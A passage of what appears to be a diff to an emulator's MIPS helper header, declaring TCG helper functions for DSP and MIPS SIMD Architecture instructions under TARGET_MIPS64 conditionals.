tl, tl, env) +DEF_HELPER_FLAGS_2(addqh_ph, TCG_CALL_NO_RWG_SE, tl, tl, tl) +DEF_HELPER_FLAGS_2(addqh_r_ph, TCG_CALL_NO_RWG_SE, tl, tl, tl) +DEF_HELPER_FLAGS_2(addqh_w, TCG_CALL_NO_RWG_SE, tl, tl, tl) +DEF_HELPER_FLAGS_2(addqh_r_w, TCG_CALL_NO_RWG_SE, tl, tl, tl) +#if defined(TARGET_MIPS64) +DEF_HELPER_FLAGS_3(addu_ob, 0, tl, tl, tl, env) +DEF_HELPER_FLAGS_3(addu_s_ob, 0, tl, tl, tl, env) +DEF_HELPER_FLAGS_2(adduh_ob, TCG_CALL_NO_RWG_SE, tl, tl, tl) +DEF_HELPER_FLAGS_2(adduh_r_ob, TCG_CALL_NO_RWG_SE, tl, tl, tl) +DEF_HELPER_FLAGS_3(addu_qh, 0, tl, tl, tl, env) +DEF_HELPER_FLAGS_3(addu_s_qh, 0, tl, tl, tl, env) +#endif +DEF_HELPER_FLAGS_3(subq_ph, 0, tl, tl, tl, env) +DEF_HELPER_FLAGS_3(subq_s_ph, 0, tl, tl, tl, env) +#if defined(TARGET_MIPS64) +DEF_HELPER_FLAGS_3(subq_qh, 0, tl, tl, tl, env) +DEF_HELPER_FLAGS_3(subq_s_qh, 0, tl, tl, tl, env) +#endif +DEF_HELPER_FLAGS_3(subq_s_w, 0, tl, tl, tl, env) +#if defined(TARGET_MIPS64) +DEF_HELPER_FLAGS_3(subq_pw, 0, tl, tl, tl, env) +DEF_HELPER_FLAGS_3(subq_s_pw, 0, tl, tl, tl, env) +#endif +DEF_HELPER_FLAGS_3(subu_qb, 0, tl, tl, tl, env) +DEF_HELPER_FLAGS_3(subu_s_qb, 0, tl, tl, tl, env) +DEF_HELPER_FLAGS_2(subuh_qb, TCG_CALL_NO_RWG_SE, tl, tl, tl) +DEF_HELPER_FLAGS_2(subuh_r_qb, TCG_CALL_NO_RWG_SE, tl, tl, tl) +DEF_HELPER_FLAGS_3(subu_ph, 0, tl, tl, tl, env) +DEF_HELPER_FLAGS_3(subu_s_ph, 0, tl, tl, tl, env) +DEF_HELPER_FLAGS_2(subqh_ph, TCG_CALL_NO_RWG_SE, tl, tl, tl) +DEF_HELPER_FLAGS_2(subqh_r_ph, TCG_CALL_NO_RWG_SE, tl, tl, tl) +DEF_HELPER_FLAGS_2(subqh_w, TCG_CALL_NO_RWG_SE, tl, tl, tl) +DEF_HELPER_FLAGS_2(subqh_r_w, TCG_CALL_NO_RWG_SE, tl, tl, tl) +#if defined(TARGET_MIPS64) +DEF_HELPER_FLAGS_3(subu_ob, 0, tl, tl, tl, env) +DEF_HELPER_FLAGS_3(subu_s_ob, 0, tl, tl, tl, env) +DEF_HELPER_FLAGS_2(subuh_ob, TCG_CALL_NO_RWG_SE, tl, tl, tl) +DEF_HELPER_FLAGS_2(subuh_r_ob, TCG_CALL_NO_RWG_SE, tl, tl, tl) +DEF_HELPER_FLAGS_3(subu_qh, 0, tl, tl, tl, env) +DEF_HELPER_FLAGS_3(subu_s_qh, 0, tl, tl, tl, env) +#endif +DEF_HELPER_FLAGS_3(addsc, 0, tl, tl, tl, env) +DEF_HELPER_FLAGS_3(addwc, 0, tl, tl, tl, env) +DEF_HELPER_FLAGS_2(modsub, TCG_CALL_NO_RWG_SE, tl, tl, tl) +DEF_HELPER_FLAGS_1(raddu_w_qb, TCG_CALL_NO_RWG_SE, tl, tl) +#if defined(TARGET_MIPS64) +DEF_HELPER_FLAGS_1(raddu_l_ob, TCG_CALL_NO_RWG_SE, tl, tl) +#endif +DEF_HELPER_FLAGS_2(absq_s_qb, 0, tl, tl, env) +DEF_HELPER_FLAGS_2(absq_s_ph, 0, tl, tl, env) +DEF_HELPER_FLAGS_2(absq_s_w, 0, tl, tl, env) +#if defined(TARGET_MIPS64) +DEF_HELPER_FLAGS_2(absq_s_ob, 0, tl, tl, env) +DEF_HELPER_FLAGS_2(absq_s_qh, 0, tl, tl, env) +DEF_HELPER_FLAGS_2(absq_s_pw, 0, tl, tl, env) +#endif +DEF_HELPER_FLAGS_2(precr_qb_ph, TCG_CALL_NO_RWG_SE, tl, tl, tl) +DEF_HELPER_FLAGS_2(precrq_qb_ph, TCG_CALL_NO_RWG_SE, tl, tl, tl) +DEF_HELPER_FLAGS_3(precr_sra_ph_w, TCG_CALL_NO_RWG_SE, + tl, i32, tl, tl) +DEF_HELPER_FLAGS_3(precr_sra_r_ph_w, TCG_CALL_NO_RWG_SE, + tl, i32, tl, tl) +DEF_HELPER_FLAGS_2(precrq_ph_w, TCG_CALL_NO_RWG_SE, tl, tl, tl) +DEF_HELPER_FLAGS_3(precrq_rs_ph_w, 0, tl, tl, tl, env) +#if defined(TARGET_MIPS64) +DEF_HELPER_FLAGS_2(precr_ob_qh, TCG_CALL_NO_RWG_SE, tl, tl, tl) +DEF_HELPER_FLAGS_3(precr_sra_qh_pw, + TCG_CALL_NO_RWG_SE, tl, tl, tl, i32) +DEF_HELPER_FLAGS_3(precr_sra_r_qh_pw, + TCG_CALL_NO_RWG_SE, tl, tl, tl, i32) +DEF_HELPER_FLAGS_2(precrq_ob_qh, TCG_CALL_NO_RWG_SE, tl, tl, tl) +DEF_HELPER_FLAGS_2(precrq_qh_pw, TCG_CALL_NO_RWG_SE, tl, tl, tl) +DEF_HELPER_FLAGS_3(precrq_rs_qh_pw, + TCG_CALL_NO_RWG_SE, tl, tl, tl, env) +DEF_HELPER_FLAGS_2(precrq_pw_l, TCG_CALL_NO_RWG_SE, tl, tl, tl) +#endif +DEF_HELPER_FLAGS_3(precrqu_s_qb_ph, 0, tl, tl, tl, env) +#if defined(TARGET_MIPS64) +DEF_HELPER_FLAGS_3(precrqu_s_ob_qh, + TCG_CALL_NO_RWG_SE, tl, tl, tl, env) + +DEF_HELPER_FLAGS_1(preceq_pw_qhl, TCG_CALL_NO_RWG_SE, tl, tl) +DEF_HELPER_FLAGS_1(preceq_pw_qhr, TCG_CALL_NO_RWG_SE, tl, tl) +DEF_HELPER_FLAGS_1(preceq_pw_qhla, TCG_CALL_NO_RWG_SE, tl, tl) +DEF_HELPER_FLAGS_1(preceq_pw_qhra, TCG_CALL_NO_RWG_SE, tl, tl) +#endif +DEF_HELPER_FLAGS_1(precequ_ph_qbl, TCG_CALL_NO_RWG_SE, tl, tl) +DEF_HELPER_FLAGS_1(precequ_ph_qbr, TCG_CALL_NO_RWG_SE, tl, tl) +DEF_HELPER_FLAGS_1(precequ_ph_qbla, TCG_CALL_NO_RWG_SE, tl, tl) +DEF_HELPER_FLAGS_1(precequ_ph_qbra, TCG_CALL_NO_RWG_SE, tl, tl) +#if defined(TARGET_MIPS64) +DEF_HELPER_FLAGS_1(precequ_qh_obl, TCG_CALL_NO_RWG_SE, tl, tl) +DEF_HELPER_FLAGS_1(precequ_qh_obr, TCG_CALL_NO_RWG_SE, tl, tl) +DEF_HELPER_FLAGS_1(precequ_qh_obla, TCG_CALL_NO_RWG_SE, tl, tl) +DEF_HELPER_FLAGS_1(precequ_qh_obra, TCG_CALL_NO_RWG_SE, tl, tl) +#endif +DEF_HELPER_FLAGS_1(preceu_ph_qbl, TCG_CALL_NO_RWG_SE, tl, tl) +DEF_HELPER_FLAGS_1(preceu_ph_qbr, TCG_CALL_NO_RWG_SE, tl, tl) +DEF_HELPER_FLAGS_1(preceu_ph_qbla, TCG_CALL_NO_RWG_SE, tl, tl) +DEF_HELPER_FLAGS_1(preceu_ph_qbra, TCG_CALL_NO_RWG_SE, tl, tl) +#if defined(TARGET_MIPS64) +DEF_HELPER_FLAGS_1(preceu_qh_obl, TCG_CALL_NO_RWG_SE, tl, tl) +DEF_HELPER_FLAGS_1(preceu_qh_obr, TCG_CALL_NO_RWG_SE, tl, tl) +DEF_HELPER_FLAGS_1(preceu_qh_obla, TCG_CALL_NO_RWG_SE, tl, tl) +DEF_HELPER_FLAGS_1(preceu_qh_obra, TCG_CALL_NO_RWG_SE, tl, tl) +#endif + +/* DSP GPR-Based Shift Sub-class insns */ +DEF_HELPER_FLAGS_3(shll_qb, 0, tl, tl, tl, env) +#if defined(TARGET_MIPS64) +DEF_HELPER_FLAGS_3(shll_ob, 0, tl, tl, tl, env) +#endif +DEF_HELPER_FLAGS_3(shll_ph, 0, tl, tl, tl, env) +DEF_HELPER_FLAGS_3(shll_s_ph, 0, tl, tl, tl, env) +#if defined(TARGET_MIPS64) +DEF_HELPER_FLAGS_3(shll_qh, 0, tl, tl, tl, env) +DEF_HELPER_FLAGS_3(shll_s_qh, 0, tl, tl, tl, env) +#endif +DEF_HELPER_FLAGS_3(shll_s_w, 0, tl, tl, tl, env) +#if defined(TARGET_MIPS64) +DEF_HELPER_FLAGS_3(shll_pw, 0, tl, tl, tl, env) +DEF_HELPER_FLAGS_3(shll_s_pw, 0, tl, tl, tl, env) +#endif +DEF_HELPER_FLAGS_2(shrl_qb, TCG_CALL_NO_RWG_SE, tl, tl, tl) +DEF_HELPER_FLAGS_2(shrl_ph, TCG_CALL_NO_RWG_SE, tl, tl, tl) +#if defined(TARGET_MIPS64) +DEF_HELPER_FLAGS_2(shrl_ob, TCG_CALL_NO_RWG_SE, tl, tl, tl) +DEF_HELPER_FLAGS_2(shrl_qh, TCG_CALL_NO_RWG_SE, tl, tl, tl) +#endif +DEF_HELPER_FLAGS_2(shra_qb, TCG_CALL_NO_RWG_SE, tl, tl, tl) +DEF_HELPER_FLAGS_2(shra_r_qb, TCG_CALL_NO_RWG_SE, tl, tl, tl) +#if defined(TARGET_MIPS64) +DEF_HELPER_FLAGS_2(shra_ob, TCG_CALL_NO_RWG_SE, tl, tl, tl) +DEF_HELPER_FLAGS_2(shra_r_ob, TCG_CALL_NO_RWG_SE, tl, tl, tl) +#endif +DEF_HELPER_FLAGS_2(shra_ph, TCG_CALL_NO_RWG_SE, tl, tl, tl) +DEF_HELPER_FLAGS_2(shra_r_ph, TCG_CALL_NO_RWG_SE, tl, tl, tl) +DEF_HELPER_FLAGS_2(shra_r_w, TCG_CALL_NO_RWG_SE, tl, tl, tl) +#if defined(TARGET_MIPS64) +DEF_HELPER_FLAGS_2(shra_qh, TCG_CALL_NO_RWG_SE, tl, tl, tl) +DEF_HELPER_FLAGS_2(shra_r_qh, TCG_CALL_NO_RWG_SE, tl, tl, tl) +DEF_HELPER_FLAGS_2(shra_pw, TCG_CALL_NO_RWG_SE, tl, tl, tl) +DEF_HELPER_FLAGS_2(shra_r_pw, TCG_CALL_NO_RWG_SE, tl, tl, tl) +#endif + +/* DSP Multiply Sub-class insns */ +DEF_HELPER_FLAGS_3(muleu_s_ph_qbl, 0, tl, tl, tl, env) +DEF_HELPER_FLAGS_3(muleu_s_ph_qbr, 0, tl, tl, tl, env) +#if defined(TARGET_MIPS64) +DEF_HELPER_FLAGS_3(muleu_s_qh_obl, 0, tl, tl, tl, env) +DEF_HELPER_FLAGS_3(muleu_s_qh_obr, 0, tl, tl, tl, env) +#endif +DEF_HELPER_FLAGS_3(mulq_rs_ph, 0, tl, tl, tl, env) +#if defined(TARGET_MIPS64) +DEF_HELPER_FLAGS_3(mulq_rs_qh, 0, tl, tl, tl, env) +#endif +DEF_HELPER_FLAGS_3(muleq_s_w_phl, 0, tl, tl, tl, env) +DEF_HELPER_FLAGS_3(muleq_s_w_phr, 0, tl, tl, tl, env) +#if defined(TARGET_MIPS64) +DEF_HELPER_FLAGS_3(muleq_s_pw_qhl, 0, tl, tl, tl, env) +DEF_HELPER_FLAGS_3(muleq_s_pw_qhr, 0, tl, tl, tl, env) +#endif +DEF_HELPER_FLAGS_4(dpau_h_qbl, 0, void, i32, tl, tl, env) +DEF_HELPER_FLAGS_4(dpau_h_qbr, 0, void, i32, tl, tl, env) +#if defined(TARGET_MIPS64) +DEF_HELPER_FLAGS_4(dpau_h_obl, 0, void, tl, tl, i32, env) +DEF_HELPER_FLAGS_4(dpau_h_obr, 0, void, tl, tl, i32, env) +#endif +DEF_HELPER_FLAGS_4(dpsu_h_qbl, 0, void, i32, tl, tl, env) +DEF_HELPER_FLAGS_4(dpsu_h_qbr, 0, void, i32, tl, tl, env) +#if defined(TARGET_MIPS64) +DEF_HELPER_FLAGS_4(dpsu_h_obl, 0, void, tl, tl, i32, env) +DEF_HELPER_FLAGS_4(dpsu_h_obr, 0, void, tl, tl, i32, env) +#endif +DEF_HELPER_FLAGS_4(dpa_w_ph, 0, void, i32, tl, tl, env) +#if defined(TARGET_MIPS64) +DEF_HELPER_FLAGS_4(dpa_w_qh, 0, void, tl, tl, i32, env) +#endif +DEF_HELPER_FLAGS_4(dpax_w_ph, 0, void, i32, tl, tl, env) +DEF_HELPER_FLAGS_4(dpaq_s_w_ph, 0, void, i32, tl, tl, env) +#if defined(TARGET_MIPS64) +DEF_HELPER_FLAGS_4(dpaq_s_w_qh, 0, void, tl, tl, i32, env) +#endif +DEF_HELPER_FLAGS_4(dpaqx_s_w_ph, 0, void, i32, tl, tl, env) +DEF_HELPER_FLAGS_4(dpaqx_sa_w_ph, 0, void, i32, tl, tl, env) +DEF_HELPER_FLAGS_4(dps_w_ph, 0, void, i32, tl, tl, env) +#if defined(TARGET_MIPS64) +DEF_HELPER_FLAGS_4(dps_w_qh, 0, void, tl, tl, i32, env) +#endif +DEF_HELPER_FLAGS_4(dpsx_w_ph, 0, void, i32, tl, tl, env) +DEF_HELPER_FLAGS_4(dpsq_s_w_ph, 0, void, i32, tl, tl, env) +#if defined(TARGET_MIPS64) +DEF_HELPER_FLAGS_4(dpsq_s_w_qh, 0, void, tl, tl, i32, env) +#endif +DEF_HELPER_FLAGS_4(dpsqx_s_w_ph, 0, void, i32, tl, tl, env) +DEF_HELPER_FLAGS_4(dpsqx_sa_w_ph, 0, void, i32, tl, tl, env) +DEF_HELPER_FLAGS_4(mulsaq_s_w_ph, 0, void, i32, tl, tl, env) +#if defined(TARGET_MIPS64) +DEF_HELPER_FLAGS_4(mulsaq_s_w_qh, 0, void, tl, tl, i32, env) +#endif +DEF_HELPER_FLAGS_4(dpaq_sa_l_w, 0, void, i32, tl, tl, env) +#if defined(TARGET_MIPS64) +DEF_HELPER_FLAGS_4(dpaq_sa_l_pw, 0, void, tl, tl, i32, env) +#endif +DEF_HELPER_FLAGS_4(dpsq_sa_l_w, 0, void, i32, tl, tl, env) +#if defined(TARGET_MIPS64) +DEF_HELPER_FLAGS_4(dpsq_sa_l_pw, 0, void, tl, tl, i32, env) +DEF_HELPER_FLAGS_4(mulsaq_s_l_pw, 0, void, tl, tl, i32, env) +#endif +DEF_HELPER_FLAGS_4(maq_s_w_phl, 0, void, i32, tl, tl, env) +DEF_HELPER_FLAGS_4(maq_s_w_phr, 0, void, i32, tl, tl, env) +DEF_HELPER_FLAGS_4(maq_sa_w_phl, 0, void, i32, tl, tl, env) +DEF_HELPER_FLAGS_4(maq_sa_w_phr, 0, void, i32, tl, tl, env) +DEF_HELPER_FLAGS_3(mul_ph, 0, tl, tl, tl, env) +DEF_HELPER_FLAGS_3(mul_s_ph, 0, tl, tl, tl, env) +DEF_HELPER_FLAGS_3(mulq_s_ph, 0, tl, tl, tl, env) +DEF_HELPER_FLAGS_3(mulq_s_w, 0, tl, tl, tl, env) +DEF_HELPER_FLAGS_3(mulq_rs_w, 0, tl, tl, tl, env) +DEF_HELPER_FLAGS_4(mulsa_w_ph, 0, void, i32, tl, tl, env) +#if defined(TARGET_MIPS64) +DEF_HELPER_FLAGS_4(maq_s_w_qhll, 0, void, tl, tl, i32, env) +DEF_HELPER_FLAGS_4(maq_s_w_qhlr, 0, void, tl, tl, i32, env) +DEF_HELPER_FLAGS_4(maq_s_w_qhrl, 0, void, tl, tl, i32, env) +DEF_HELPER_FLAGS_4(maq_s_w_qhrr, 0, void, tl, tl, i32, env) +DEF_HELPER_FLAGS_4(maq_sa_w_qhll, 0, void, tl, tl, i32, env) +DEF_HELPER_FLAGS_4(maq_sa_w_qhlr, 0, void, tl, tl, i32, env) +DEF_HELPER_FLAGS_4(maq_sa_w_qhrl, 0, void, tl, tl, i32, env) +DEF_HELPER_FLAGS_4(maq_sa_w_qhrr, 0, void, tl, tl, i32, env) +DEF_HELPER_FLAGS_4(maq_s_l_pwl, 0, void, tl, tl, i32, env) +DEF_HELPER_FLAGS_4(maq_s_l_pwr, 0, void, tl, tl, i32, env) +DEF_HELPER_FLAGS_4(dmadd, 0, void, tl, tl, i32, env) +DEF_HELPER_FLAGS_4(dmaddu, 0, void, tl, tl, i32, env) +DEF_HELPER_FLAGS_4(dmsub, 0, void, tl, tl, i32, env) +DEF_HELPER_FLAGS_4(dmsubu, 0, void, tl, tl, i32, env) +#endif + +/* DSP Bit/Manipulation Sub-class insns */ +DEF_HELPER_FLAGS_1(bitrev, TCG_CALL_NO_RWG_SE, tl, tl) +DEF_HELPER_FLAGS_3(insv, 0, tl, env, tl, tl) +#if defined(TARGET_MIPS64) +DEF_HELPER_FLAGS_3(dinsv, 0, tl, env, tl, tl) +#endif + +/* DSP Compare-Pick Sub-class insns */ +DEF_HELPER_FLAGS_3(cmpu_eq_qb, 0, void, tl, tl, env) +DEF_HELPER_FLAGS_3(cmpu_lt_qb, 0, void, tl, tl, env) +DEF_HELPER_FLAGS_3(cmpu_le_qb, 0, void, tl, tl, env) +DEF_HELPER_FLAGS_2(cmpgu_eq_qb, TCG_CALL_NO_RWG_SE, tl, tl, tl) +DEF_HELPER_FLAGS_2(cmpgu_lt_qb, TCG_CALL_NO_RWG_SE, tl, tl, tl) +DEF_HELPER_FLAGS_2(cmpgu_le_qb, TCG_CALL_NO_RWG_SE, tl, tl, tl) +DEF_HELPER_FLAGS_3(cmp_eq_ph, 0, void, tl, tl, env) +DEF_HELPER_FLAGS_3(cmp_lt_ph, 0, void, tl, tl, env) +DEF_HELPER_FLAGS_3(cmp_le_ph, 0, void, tl, tl, env) +#if defined(TARGET_MIPS64) +DEF_HELPER_FLAGS_3(cmpu_eq_ob, 0, void, tl, tl, env) +DEF_HELPER_FLAGS_3(cmpu_lt_ob, 0, void, tl, tl, env) +DEF_HELPER_FLAGS_3(cmpu_le_ob, 0, void, tl, tl, env) +DEF_HELPER_FLAGS_3(cmpgdu_eq_ob, 0, tl, tl, tl, env) +DEF_HELPER_FLAGS_3(cmpgdu_lt_ob, 0, tl, tl, tl, env) +DEF_HELPER_FLAGS_3(cmpgdu_le_ob, 0, tl, tl, tl, env) +DEF_HELPER_FLAGS_2(cmpgu_eq_ob, TCG_CALL_NO_RWG_SE, tl, tl, tl) +DEF_HELPER_FLAGS_2(cmpgu_lt_ob, TCG_CALL_NO_RWG_SE, tl, tl, tl) +DEF_HELPER_FLAGS_2(cmpgu_le_ob, TCG_CALL_NO_RWG_SE, tl, tl, tl) +DEF_HELPER_FLAGS_3(cmp_eq_qh, 0, void, tl, tl, env) +DEF_HELPER_FLAGS_3(cmp_lt_qh, 0, void, tl, tl, env) +DEF_HELPER_FLAGS_3(cmp_le_qh, 0, void, tl, tl, env) +DEF_HELPER_FLAGS_3(cmp_eq_pw, 0, void, tl, tl, env) +DEF_HELPER_FLAGS_3(cmp_lt_pw, 0, void, tl, tl, env) +DEF_HELPER_FLAGS_3(cmp_le_pw, 0, void, tl, tl, env) +#endif +DEF_HELPER_FLAGS_3(pick_qb, 0, tl, tl, tl, env) +DEF_HELPER_FLAGS_3(pick_ph, 0, tl, tl, tl, env) +#if defined(TARGET_MIPS64) +DEF_HELPER_FLAGS_3(pick_ob, 0, tl, tl, tl, env) +DEF_HELPER_FLAGS_3(pick_qh, 0, tl, tl, tl, env) +DEF_HELPER_FLAGS_3(pick_pw, 0, tl, tl, tl, env) +#endif +DEF_HELPER_FLAGS_2(packrl_ph, TCG_CALL_NO_RWG_SE, tl, tl, tl) +#if defined(TARGET_MIPS64) +DEF_HELPER_FLAGS_2(packrl_pw, TCG_CALL_NO_RWG_SE, tl, tl, tl) +#endif + +/* DSP Accumulator and DSPControl Access Sub-class insns */ +DEF_HELPER_FLAGS_3(extr_w, 0, tl, tl, tl, env) +DEF_HELPER_FLAGS_3(extr_r_w, 0, tl, tl, tl, env) +DEF_HELPER_FLAGS_3(extr_rs_w, 0, tl, tl, tl, env) +#if defined(TARGET_MIPS64) +DEF_HELPER_FLAGS_3(dextr_w, 0, tl, tl, tl, env) +DEF_HELPER_FLAGS_3(dextr_r_w, 0, tl, tl, tl, env) +DEF_HELPER_FLAGS_3(dextr_rs_w, 0, tl, tl, tl, env) +DEF_HELPER_FLAGS_3(dextr_l, 0, tl, tl, tl, env) +DEF_HELPER_FLAGS_3(dextr_r_l, 0, tl, tl, tl, env) +DEF_HELPER_FLAGS_3(dextr_rs_l, 0, tl, tl, tl, env) +#endif +DEF_HELPER_FLAGS_3(extr_s_h, 0, tl, tl, tl, env) +#if defined(TARGET_MIPS64) +DEF_HELPER_FLAGS_3(dextr_s_h, 0, tl, tl, tl, env) +#endif +DEF_HELPER_FLAGS_3(extp, 0, tl, tl, tl, env) +DEF_HELPER_FLAGS_3(extpdp, 0, tl, tl, tl, env) +#if defined(TARGET_MIPS64) +DEF_HELPER_FLAGS_3(dextp, 0, tl, tl, tl, env) +DEF_HELPER_FLAGS_3(dextpdp, 0, tl, tl, tl, env) +#endif +DEF_HELPER_FLAGS_3(shilo, 0, void, tl, tl, env) +#if defined(TARGET_MIPS64) +DEF_HELPER_FLAGS_3(dshilo, 0, void, tl, tl, env) +#endif +DEF_HELPER_FLAGS_3(mthlip, 0, void, tl, tl, env) +#if defined(TARGET_MIPS64) +DEF_HELPER_FLAGS_3(dmthlip, 0, void, tl, tl, env) +#endif +DEF_HELPER_FLAGS_3(wrdsp, 0, void, tl, tl, env) +DEF_HELPER_FLAGS_2(rddsp, 0, tl, tl, env) + +/* MIPS SIMD Architecture */ +DEF_HELPER_4(msa_andi_b, void, env, i32, i32, i32) +DEF_HELPER_4(msa_ori_b, void, env, i32, i32, i32) +DEF_HELPER_4(msa_nori_b, void, env, i32, i32, i32) +DEF_HELPER_4(msa_xori_b, void, env, i32, i32, i32) +DEF_HELPER_4(msa_bmnzi_b, void, env, i32, i32, i32) +DEF_HELPER_4(msa_bmzi_b, void, env, i32, i32, i32) +DEF_HELPER_4(msa_bseli_b, void, env, i32, i32, i32) +DEF_HELPER_5(msa_shf_df, void, env, i32, i32, i32, i32) + +DEF_HELPER_5(msa_addvi_df, void, env, i32, i32, i32, s32) +DEF_HELPER_5(msa_subvi_df, void, env, i32, i32, i32, s32) +DEF_HELPER_5(msa_maxi_s_df, void, env, i32, i32, i32, s32) +DEF_HELPER_5(msa_maxi_u_df, void, env, i32, i32, i32, s32) +DEF_HELPER_5(msa_mini_s_df, void, env, i32, i32, i32, s32) +DEF_HELPER_5(msa_mini_u_df, void, env, i32, i32, i32, s32) +DEF_HELPER_5(msa_ceqi_df, void, env, i32, i32, i32, s32) +DEF_HELPER_5(msa_clti_s_df, void, env, i32, i32, i32, s32) +DEF_HELPER_5(msa_clti_u_df, void, env, i32, i32, i32, s32) +DEF_HELPER_5(msa_clei_s_df, void, env, i32, i32, i32, s32) +DEF_HELPER_5(msa_clei_u_df, void, env, i32, i32, i32, s32) +DEF_HELPER_4(msa_ldi_df, void, env, i32, i32, s32) + +DEF_HELPER_5(msa_slli_df, void, env, i32, i32, i32, i32) +DEF_HELPER_5(msa_srai_df, void, env, i32, i32, i32, i32) +DEF_HELPER_5(msa_srli_df, void, env, i32, i32, i32, i32) +DEF_HELPER_5(msa_bclri_df, void, env, i32, i32, i32, i32) +DEF_HELPER_5(msa_bseti_df, void, env, i32, i32, i32, i32) +DEF_HELPER_5(msa_bnegi_df, void, env, i32, i32, i32, i32) +DEF_HELPER_5(msa_binsli_df, void, env, i32, i32, i32, i32) +DEF_HELPER_5(msa_binsri_df, void, env, i32, i32, i32, i32) +DEF_HELPER_5(msa_sat_s_df, void, env, i32, i32, i32, i32) +DEF_HELPER_5(msa_sat_u_df, void, env, i32, i32, i32, i32) +DEF_HELPER_5(msa_srari_df, void, env, i32, i32, i32, i32) +DEF_HELPER_5(msa_srlri_df, void, env, i32, i32, i32, i32) + +DEF_HELPER_5(msa_sll_df, void, env, i32, i32, i32, i32) +DEF_HELPER_5(msa_sra_df, void, env, i32, i32, i32, i32) +DEF_HELPER_5(msa_srl_df, void, env, i32, i32, i32, i32) +DEF_HELPER_5(msa_bclr_df, void, env, i32, i32, i32, i32) +DEF_HELPER_5(msa_bset_df, void, env, i32, i32, i32, i32) +DEF_HELPER_5(msa_bneg_df, void, env, i32, i32, i32, i32) +DEF_HELPER_5(msa_binsl_df, void, env, i32, i32, i32, i32) +DEF_HELPER_5(msa_binsr_df, void, env, i32, i32, i32, i32) +DEF_HELPER_5(msa_addv_df, void, env, i32, i32, i32, i32) +DEF_HELPER_5(msa_subv_df, void, env, i32, i32, i32, i32) +DEF_HELPER_5(msa_max_s_df, void, env, i32, i32, i32, i32) +DEF_HELPER_5(msa_max_u_df, void, env, i32, i32, i32, i32) +DEF_HELPER_5(msa_min_s_df, void, env, i32, i32, i32, i32) +DEF_HELPER_5(msa_min_u_df, void, env, i32, i32, i32, i32) +DEF_HELPER_5(msa_max_a_df, void, env, i32, i32, i32, i32) +DEF_HELPER_5(msa_min_a_df, void, env, i32, i32, i32, i32) +DEF_HELPER_5(msa_ceq_df, void, env, i32, i32, i32, i32) +DEF_HELPER_5(msa_clt_s_df, void, env, i32, i32, i32, i32) +DEF_HELPER_5(msa_clt_u_df, void, env, i32, i32, i32, i32) +DEF_HELPER_5(msa_cle_s_df, void, env, i32, i32, i32, i32) +DEF_HELPER_5(msa_cle_u_df, void, env, i32, i32, i32, i32) +DEF_HELPER_5(msa_add_a_df, void, env, i32, i32, i32, i32) +DEF_HELPER_5(msa_adds_a_df, void, env, i32, i32, i32, i32) +DEF_HELPER_5(msa_adds_s_df, void, env, i32, i32, i32, i32) +DEF_HELPER_5(msa_adds_u_df, void, env, i32, i32, i32, i32) +DEF_HELPER_5(msa_ave_s_df, void, env, i32, i32, i32, i32) +DEF_HELPER_5(msa_ave_u_df, void, env, i32, i32, i32, i32) +DEF_HELPER_5(msa_aver_s_df, void, env, i32, i32, i32, i32) +DEF_HELPER_5(msa_aver_u_df, void, env, i32, i32, i32, i32) +DEF_HELPER_5(msa_subs_s_df, void, env, i32, i32, i32, i32) +DEF_HELPER_5(msa_subs_u_df, void, env, i32, i32, i32, i32) +DEF_HELPER_5(msa_subsus_u_df, void, env, i32, i32, i32, i32) +DEF_HELPER_5(msa_subsuu_s_df, void, env, i32, i32, i32, i32) +DEF_HELPER_5(msa_asub_s_df, void, env, i32, i32, i32, i32) +DEF_HELPER_5(msa_asub_u_df, void, env, i32, i32, i32, i32) +DEF_HELPER_5(msa_mulv_df, void, env, i32, i32, i32, i32) +DEF_HELPER_5(msa_maddv_df, void, env, i32, i32, i32, i32) +DEF_HELPER_5(msa_msubv_df, void, env, i32, i32, i32, i32) +DEF_HELPER_5(msa_div_s_df, void, env, i32, i32, i32, i32) +DEF_HELPER_5(msa_div_u_df, void, env, i32, i32, i32, i32) +DEF_HELPER_5(msa_mod_s_df, void, env, i32, i32, i32, i32) +DEF_HELPER_5(msa_mod_u_df, void, env, i32, i32, i32, i32) +DEF_HELPER_5(msa_dotp_s_df, void, env, i32, i32, i32, i32) +DEF_HELPER_5(msa_dotp_u_df, void, env, i32, i32, i32, i32) +DEF_HELPER_5(msa_dpadd_s_df, void, env, i32, i32, i32, i32) +DEF_HELPER_5(msa_dpadd_u_df, void, env, i32, i32, i32, i32) +DEF_HELPER_5(msa_dpsub_s_df, void, env, i32, i32, i32, i32) +DEF_HELPER_5(msa_dpsub_u_df, void, env, i32, i32, i32, i32) +DEF_HELPER_5(msa_sld_df, void, env, i32, i32, i32, i32) +DEF_HELPER_5(msa_splat_df, void, env, i32, i32, i32, i32) +DEF_HELPER_5(msa_pckev_df, void, env, i32, i32, i32, i32) +DEF_HELPER_5(msa_pckod_df, void, env, i32, i32, i32, i32) +DEF_HELPER_5(msa_ilvl_df, void, env, i32, i32, i32, i32) +DEF_HELPER_5(msa_ilvr_df, void, env, i32, i32, i32, i32) +DEF_HELPER_5(msa_ilvev_df, void, env, i32, i32, i32, i32) +DEF_HELPER_5(msa_ilvod_df, void, env, i32, i32, i32, i32) +DEF_HELPER_5(msa_vshf_df, void, env, i32, i32, i32, i32) +DEF_HELPER_5(msa_srar_df, void, env, i32, i32, i32, i32) +DEF_HELPER_5(msa_srlr_df, void, env, i32, i32, i32, i32) +DEF_HELPER_5(msa_hadd_s_df, void, env, i32, i32, i32, i32) +DEF_HELPER_5(msa_hadd_u_df, void, env, i32, i32, i32, i32) +DEF_HELPER_5(msa_hsub_s_df, void, env, i32, i32, i32, i32) +DEF_HELPER_5(msa_hsub_u_df, void, env, i32, i32, i32, i32) + +DEF_HELPER_5(msa_sldi_df, void, env, i32, i32, i32, i32) +DEF_HELPER_5(msa_splati_df, void, env, i32, i32, i32, i32) +DEF_HELPER_5(msa_copy_s_df, void, env, i32, i32, i32, i32) +DEF_HELPER_5(msa_copy_u_df, void, env, i32, i32, i32, i32) +DEF_HELPER_5(msa_insert_df, void, env, i32, i32, i32, i32) +DEF_HELPER_5(msa_insve_df, void, env, i32, i32, i32, i32) +DEF_HELPER_3(msa_ctcmsa, void, env, tl, i32) +DEF_HELPER_2(msa_cfcmsa, tl, env, i32) +DEF_HELPER_3(msa_move_v, void, env, i32, i32) + +DEF_HELPER_5(msa_fcaf_df, void, env, i32, i32, i32, i32) +DEF_HELPER_5(msa_fcun_df, void, env, i32, i32, i32, i32) +DEF_HELPER_5(msa_fceq_df, void, env, i32, i32, i32, i32) +DEF_HELPER_5(msa_fcueq_df, void, env, i32, i32, i32, i32) 